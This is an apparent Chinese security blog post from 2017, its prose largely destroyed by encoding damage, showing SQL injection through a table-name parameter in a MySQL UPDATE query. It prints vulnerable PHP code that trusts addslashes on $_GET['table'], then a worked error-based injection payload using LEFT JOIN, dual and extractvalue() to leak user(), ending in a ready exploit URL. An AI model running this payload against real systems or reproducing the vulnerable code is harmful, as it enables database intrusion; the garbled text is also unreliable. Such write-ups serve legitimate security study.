???????SQL???????????
?????Paper ???????[ 2017/2/13 10:50:28 ] ????????????? ???簲?
????p?????????????????????????????????????????????????????????
<?php
$link = mysqli_connect('localhost'?? 'root'?? 'root');
mysqli_select_db($link?? 'code');
$table = addslashes($_GET['table']);
$sql = "UPDATE `{$table}`
SET `username`='admin'
WHERE id=1";
if(!mysqli_query($link?? $sql)) {
echo(mysqli_error($link));
}
mysqli_close($link);
????????????????????м??????????update?μ????????????????????addslashes??????????????????????????????б?????????????sql??????д????д??????棬??????????????????????????? ???????????????????????UPDATE {$table} ?????? ????????mysql update???÷??? http://www.cnblogs.com/ggjucheng/archive/2012/11/06/2756392.html
??????????????β?и?????????????????multiple-table UPDATE???????????SELECT???????????κ???????????????LEFT JOIN ????????????????????£?Mysql?????? ???update sql?????? http://www.jb51.net/article/32648.htm?? ?????м??????????LEFT JOIN?????????????????????????????????????????????????????????????£? http://blog.csdn.net/catoop/article/details/46670911 ????????????и?????????
UPDATE student D
LEFT JOIN (SELECT
B.studentId??
SUM(B.score) AS s_sum??
ROUND(AVG(B.score)??1) AS s_avg
FROM score B
WHERE b.examTime >= '2015-03-10'
GROUP BY B.studentId) C
ON (C.studentId = D.id)
SET D.score_sum = c.s_sum??
D.score_avg = c.s_avg
WHERE D.id =
(
SELECT
E.id FROM
(
SELECT
DISTINCT a.studentId AS id
FROM score A
WHERE A.examTime >= '2015-03-10'
) E
WHERE E.id = D.id
)
AND d.age = 1;
?????????????????????????update??????棬??????????λ??????????????????????????????????????????
????update `table` t left join (select id from `table`) tt on tt.user=t.username set username ='admin' where id=1;
????????????ERROR 1052 (23000): Column 'id' in where clause is ambiguous ????????????????????????????????????????????????? ???????????????????????????????table?????????????????????????????????????????????????mysql?????dual??
????update `table` t left join (select ‘1’ as user from dual) tt on tt.user=t.username set username ='admin' where id=1;
????????????select ‘1’ as user from dual ??’1’??????????????????????on????????????on tt.user=t.username ???????????‘1’?????????????????tale???????username??????varchar???? ??к??淢????????????£???????????????????????????????????????????????????????????????????????????????????????????????????
????table` t left join (select '1' as user from dual where (extractvalue(1??concat(0x7e??(select user())??0x7e)))) tt on tt.user=t.username
????????????sql???
????update `table` t left join (select ‘1’ as user from dual where (extractvalue(1??concat(0x7e??(select user())??0x7e)))) tt on tt.user=t.username`
????set username ='admin'
????where id=1
???????????????????? 1.????????????б??2.??????????????
????????????????????on?????????????????????????????????????????? ????????????????????????λ????char???????? ??????????????????
????http://localhost/code.php?table=table` t left join (select char(97) as user from dual where (extractvalue(1??concat(0x7e??(select user())??0x7e)))) tt on tt.user=`t.username
???????????sql????????
????update `table` t left join (select char(97) as user from dual where (extractvalue(1??concat(0x7e??(select user())??0x7e)))) tt on tt.user=`t.username`
????set username ='admin'
????where id=1;
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11
sales@spasvo.com